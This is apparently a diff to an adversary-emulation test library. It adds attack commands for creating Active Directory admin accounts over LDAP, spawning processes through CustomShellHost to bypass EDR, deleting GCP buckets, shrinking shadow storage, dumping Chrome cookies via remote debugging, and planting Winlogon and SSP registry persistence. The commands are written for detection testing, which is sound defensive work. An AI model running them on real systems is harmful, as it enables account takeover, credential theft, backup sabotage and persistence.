+echo removing Atomic User (temporary user)
+echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+rm deleteuser.ldif
+rm tempadmin.ldif
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available
+##### Check Prereq Commands:
+```sh
+which ldapadd && which ldapmodify
+```
+##### Get Prereq Commands:
+```sh
+echo ldapadd or ldapmodify not found; exit 1
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Active Directory Create User Account (Non-elevated)
+Use Admin Credentials to Create A Normal Account (as means of entry)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 8c992cb3-a46e-4fd5-b005-b1bab185af31
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | The domain to be tested | string | example|
+| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test|
+| admin_user | username@domain of a user with admin privileges | string | user@example.test|
+| admin_password | password of the user | string | s3CurePssw0rD!|
+| domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
+echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+```
+
+#### Cleanup Commands:
+```sh
+echo removing Atomic User (temporary user)
+echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+rm deleteuser.ldif
+rm tempadmin.ldif
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify
+##### Check Prereq Commands:
+```sh
+which ldapadd
+which ldapmodify
+```
+##### Get Prereq Commands:
+```sh
+echo ldapadd or ldapmodify not found; exit 1
+```
+
+
+
+
 <br/>
@@ -84,3 +84,101 @@ atomic_tests:
      cmd /c "net user #{username} /del >nul 2>&1"
    name: powershell
    elevation_required: false  # Requires a user to be a Domain Admin!
+- name: Active Directory Create Admin Account
+  auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab
+  description: |
+    Use Admin Credentials to Create A Domain Admin Account
+  supported_platforms:
+  - linux
+  input_arguments:
+    domain:
+      description: The domain to be tested
+      type: string
+      default: example
+    top_level_domain:
+      description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
+      type: string
+      default: test
+    admin_user:
+      description: username@domain of a user with admin privileges
+      type: string
+      default: admin@example.test
+    admin_password:
+      description: password of the user with admin privileges referenced in admin_user
+      type: string
+      default: s3CurePssw0rD!
+    domain_controller:
+      description: Name of the domain_controller machine, defined in etc/hosts
+      type: string
+      default: adVM
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Packages sssd-ad sssd-tools realmd adcli installed and realm available
+    prereq_command: |
+      which ldapadd && which ldapmodify
+    get_prereq_command: |
+      echo ldapadd or ldapmodify not found; exit 1
+  executor:
+    elevation_required: false
+    command: |
+       echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
+       echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+       ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+    cleanup_command: |
+       echo removing Atomic User (temporary user)
+       echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+       ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+       rm deleteuser.ldif
+       rm tempadmin.ldif
+    name: sh
+- name: Active Directory Create User Account (Non-elevated)
+  auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
+  description: |
+    Use Admin Credentials to Create A Normal Account (as means of entry)
+  supported_platforms:
+  - linux
+  input_arguments:
+    domain:
+      description: The domain to be tested
+      type: string
+      default: example
+    top_level_domain:
+      description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
+      type: string
+      default: test
+    admin_user:
+      description: username@domain of a user with admin privileges
+      type: string
+      default: user@example.test
+    admin_password:
+      description: password of the user
+      type: string
+      default: s3CurePssw0rD!
+    domain_controller:
+      description: Name of the domain_controller machine, defined in etc/hosts
+      type: string
+      default: adVM
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify
+    prereq_command: |
+      which ldapadd
+      which ldapmodify
+    get_prereq_command: |
+      echo ldapadd or ldapmodify not found; exit 1
+  executor:
+    elevation_required: false
+    command: |
+       echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
+       echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+       ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+    cleanup_command: |
+       echo removing Atomic User (temporary user)
+       echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+       ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+       rm deleteuser.ldif
+       rm tempadmin.ldif
+    name: sh
+
@@ -30,6 +30,8 @@ Similarly, on Linux systems adversaries may abuse trusted binaries such as <code

 - [Atomic Test #12 - Lolbas ie4uinit.exe use as proxy](#atomic-test-12---lolbas-ie4uinitexe-use-as-proxy)

+- [Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process](#atomic-test-13---lolbas-customshellhost-to-spawn-process)
+

 <br/>

@@ -582,4 +584,51 @@ del %TEMP%\ieuinit.inf >nul 2>&1



+<br/>
+<br/>
+
+## Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process
+This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+Upon execution, customshellhost.exe will spawn calc.exe.
+Note this will only work on Windows 10 or 11.
+[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b1eeb683-90bb-4365-bbc2-2689015782fe
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dest_path | Directory to copy files into | path | C:&#92;test|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+if (-not (Test-Path #{dest_path})) {
+New-Item -Path #{dest_path} -ItemType Directory
+} else {
+Write-Host "Directory #{dest_path} already exists." }
+Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+#{dest_path}\customshellhost.exe
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path #{dest_path} -Recurse -Force
+```
+
+
+
+
+
 <br/>
@@ -322,3 +322,31 @@ atomic_tests:
      del %TEMP%\ie4uinit.exe >nul 2>&1
      del %TEMP%\ieuinit.inf >nul 2>&1
    name: command_prompt
+- name: LOLBAS CustomShellHost to Spawn Process
+  auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
+  description: |
+    This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+    Upon execution, customshellhost.exe will spawn calc.exe.
+    Note this will only work on Windows 10 or 11.
+    [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+    [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+  supported_platforms:
+    - windows
+  input_arguments:
+    dest_path:
+      description: Directory to copy files into
+      type: path
+      default: C:\test
+  executor:
+    command: |
+      if (-not (Test-Path #{dest_path})) {
+      New-Item -Path #{dest_path} -ItemType Directory
+      } else {
+      Write-Host "Directory #{dest_path} already exists." }
+      Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+      Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+      #{dest_path}\customshellhost.exe
+    cleanup_command: | 
+      Remove-Item -Path #{dest_path} -Recurse -Force
+    name: powershell
+    elevation_required: true
@@ -16,6 +16,8 @@ In cloud environments, adversaries may leverage access to delete cloud storage,

 - [Atomic Test #3 - Overwrite deleted data on C drive](#atomic-test-3---overwrite-deleted-data-on-c-drive)

+- [Atomic Test #4 - GCP - Delete Bucket](#atomic-test-4---gcp---delete-bucket)
+

 <br/>

@@ -133,4 +135,91 @@ cipher.exe /w:C:



+<br/>
+<br/>
+
+## Atomic Test #4 - GCP - Delete Bucket
+This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
+
+Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
+This atomic will create a bucket then delete the bucket.
+
+Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+
+**Supported Platforms:** Iaas:gcp
+
+
+**auto_generated_guid:** 4ac71389-40f4-448a-b73f-754346b3f928
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| project_id | ID of the GCP Project you to execute the command against. | string | atomic-test-1|
+| bucket_name | The name of the bucket to delete. | string | atomic-red-team-bucket|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+gcloud config set project #{project_id}
+gcloud storage buckets delete gs://#{bucket_name}
+```
+
+#### Cleanup Commands:
+```sh
+cd $PathToAtomicsFolder/T1485/src/T1485-4/
+terraform state rm google_storage_bucket.bucket
+terraform destroy -auto-approve
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Requires gcloud
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+```
+##### Description: Check if user is logged in
+##### Check Prereq Commands:
+```sh
+gcloud config get-value account
+```
+##### Get Prereq Commands:
+```sh
+gcloud auth login --no-launch-browser
+```
+##### Description: Check if terraform is installed.
+##### Check Prereq Commands:
+```sh
+terraform version
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the terraform.
+```
+##### Description: Create dependency resources using terraform
+##### Check Prereq Commands:
+```sh
+stat $PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate
+```
+##### Get Prereq Commands:
+```sh
+cd $PathToAtomicsFolder/T1485/src/T1485-4/
+terraform init
+terraform apply -auto-approve
+```
+
+
+
+
 <br/>
@@ -67,3 +67,61 @@ atomic_tests:
    command: |
      cipher.exe /w:C:
    name: command_prompt
+- name: GCP - Delete Bucket
+  auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928
+  description: |
+    This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
+
+    Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
+    This atomic will create a bucket then delete the bucket.
+
+    Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+  supported_platforms:
+  - iaas:gcp
+  input_arguments:
+    project_id:
+      description: ID of the GCP Project you to execute the command against.
+      type: string
+      default: atomic-test-1
+    bucket_name:
+      description: The name of the bucket to delete.
+      type: string
+      default: atomic-red-team-bucket
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      gcloud config set project #{project_id}
+      gcloud storage buckets delete gs://#{bucket_name}
+    cleanup_command: |
+      cd $PathToAtomicsFolder/T1485/src/T1485-4/
+      terraform state rm google_storage_bucket.bucket
+      terraform destroy -auto-approve
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Requires gcloud
+    prereq_command: |
+      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+  - description: | 
+      Check if user is logged in 
+    prereq_command: |
+      gcloud config get-value account
+    get_prereq_command: |
+      gcloud auth login --no-launch-browser
+  - description: |
+      Check if terraform is installed.
+    prereq_command: |
+      terraform version
+    get_prereq_command: |
+        echo Please install the terraform.
+  - description: |
+      Create dependency resources using terraform
+    prereq_command: |
+      stat $PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate
+    get_prereq_command: |
+      cd $PathToAtomicsFolder/T1485/src/T1485-4/
+      terraform init
+      terraform apply -auto-approve
@@ -0,0 +1,14 @@
+provider "google" {
+}
+
+variable "project_id" {
+}
+
+variable "bucket_name" {
+}
+
+resource "google_storage_bucket" "bucket" {
+  name     = var.bucket_name
+  location = "US"
+  project  = var.project_id
+}
@@ -0,0 +1,2 @@
+project_id  = ""
+bucket_name = ""
@@ -36,6 +36,8 @@ Adversaries may also delete “online” backups that are connected to their net

 - [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)

+- [Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume](#atomic-test-10---windows---vssadmin-resize-shadowstorage-volume)
+

 <br/>

@@ -333,4 +335,32 @@ reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v



+<br/>
+<br/>
+
+## Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume
+Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** da558b07-69ae-41b9-b9d4-4d98154a7049
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%
+```
+
+
+
+
+
+
 <br/>
@@ -135,3 +135,13 @@ atomic_tests:
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
    name: command_prompt
    elevation_required: true
+- name: Windows - vssadmin Resize Shadowstorage Volume
+  auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
+  description: 
+    Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
+  supported_platforms:
+  - windows
+  executor:
+    command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+    name: powershell
+    elevation_required: true
@@ -14,6 +14,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session

 - [Atomic Test #2 - Steal Chrome Cookies (Windows)](#atomic-test-2---steal-chrome-cookies-windows)

+- [Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)](#atomic-test-3---steal-chrome-cookies-via-remote-debugging-mac)
+

 <br/>

@@ -127,4 +129,71 @@ Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -desti



+<br/>
+<br/>
+
+## Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)
+The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+If successful, this test will output a list of cookies.
+
+Note: Chrome processes will be killed during this test.
+
+See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** e43cfdaf-3fb8-4a45-8de0-7eee8741d072
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+killall 'Google Chrome'
+sleep 1
+open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+sleep 1
+/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+```
+
+#### Cleanup Commands:
+```bash
+rm -rf /tmp/WhiteChocolateMacademiaNut
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Install Go
+##### Check Prereq Commands:
+```bash
+go version
+```
+##### Get Prereq Commands:
+```bash
+brew install go
+```
+##### Description: Download and compile WhiteChocolateMacademiaNut
+##### Check Prereq Commands:
+```bash
+/tmp/WhiteChocolateMacademiaNut/chocolate -h
+```
+##### Get Prereq Commands:
+```bash
+git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
+cd /tmp/WhiteChocolateMacademiaNut
+go mod init chocolate
+go mod tidy
+go build
+```
+
+
+
+
 <br/>
@@ -77,3 +77,41 @@ atomic_tests:
      remove-item #{output_file}
    name: powershell
    elevation_required: false
+- name: Steal Chrome Cookies via Remote Debugging (Mac)
+  auto_generated_guid: e43cfdaf-3fb8-4a45-8de0-7eee8741d072
+  description: |-
+    The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+    If successful, this test will output a list of cookies.
+
+    Note: Chrome processes will be killed during this test.
+  
+    See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+  supported_platforms:
+  - macos 
+  dependency_executor_name: bash
+  dependencies:
+  - description: 'Install Go'
+    prereq_command: |-
+      go version
+    get_prereq_command: |-
+      brew install go
+  - description: 'Download and compile WhiteChocolateMacademiaNut'
+    prereq_command: |-
+      /tmp/WhiteChocolateMacademiaNut/chocolate -h
+    get_prereq_command: |-
+      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
+      cd /tmp/WhiteChocolateMacademiaNut
+      go mod init chocolate
+      go mod tidy
+      go build
+  executor:
+    command: |-
+      killall 'Google Chrome'
+      sleep 1
+      open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+      sleep 1
+      /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+    cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
+    name: bash
+    elevation_required: false
@@ -106,7 +106,9 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
 ## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
 PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.

 **Supported Platforms:** Windows

@@ -121,14 +123,18 @@ Upon successful execution, PowerShell will modify a registry value to execute at
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_to_execute | Path of notification package to execute | path | C:&#92;Windows&#92;Temp&#92;atomicNotificationPackage.dll|
+| function_to_execute | Function in notification package to execute | string | AtomicTestFunction|


 #### Attack Commands: Run with `powershell`! 


 ```powershell
-New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
 ```

 #### Cleanup Commands:
@@ -47,7 +47,9 @@ atomic_tests:
  description: |
    PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

-    Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
+    Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
+
+    Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
  supported_platforms:
  - windows
  input_arguments:
@@ -55,10 +57,17 @@ atomic_tests:
      description: Path of notification package to execute
      type: path
      default: C:\Windows\Temp\atomicNotificationPackage.dll
+    function_to_execute:
+      description: Function in notification package to execute
+      type: string
+      default: AtomicTestFunction
  executor:
    command: |
-      New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
-      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
+      New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
    cleanup_command: |
      Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
    name: powershell
@@ -6,13 +6,16 @@ The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentC

 ## Atomic Tests

- [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry)
+- [Atomic Test #1 - Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry](#atomic-test-1---modify-hklmsystemcurrentcontrolsetcontrollsa-security-support-provider-configuration-in-registry)
+
+- [Atomic Test #2 - Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry](#atomic-test-2---modify-hklmsystemcurrentcontrolsetcontrollsaosconfig-security-support-provider-configuration-in-registry)


 <br/>

-## Atomic Test #1 - Modify SSP configuration in registry
-Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
+## Atomic Test #1 - Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry
+Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/

 **Supported Platforms:** Windows

@@ -23,29 +26,63 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio



-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32. | string | not-a-ssp|
-

 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


 ```powershell
-# run these in sequence
-$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-$SecurityPackagesUpdated = $SecurityPackages
-$SecurityPackagesUpdated += "#{fake_ssp_dll}"
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
+$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+$newvalue = "AtomicTest.dll";
+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+```

-# revert (before reboot)
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+#### Cleanup Commands:
+```powershell
+$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
 ```





+<br/>
+<br/>
+
+## Atomic Test #2 - Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry
+Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** de3f8e74-3351-4fdb-a442-265dbf231738
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+$newvalue = "AtomicTest.dll";
+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+```
+
+#### Cleanup Commands:
+```powershell
+$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
+```
+
+
+
+

 <br/>
@@ -1,25 +1,42 @@
 attack_technique: T1547.005
 display_name: 'Boot or Logon Autostart Execution: Security Support Provider'
 atomic_tests:
- name: Modify SSP configuration in registry
+- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry
  auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+  description: |
+    Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+    A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+      Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+      $newvalue = "AtomicTest.dll";
+      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+      
+    cleanup_command: |-
+      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+      Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+      Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+    name: powershell
+    elevation_required: true
+
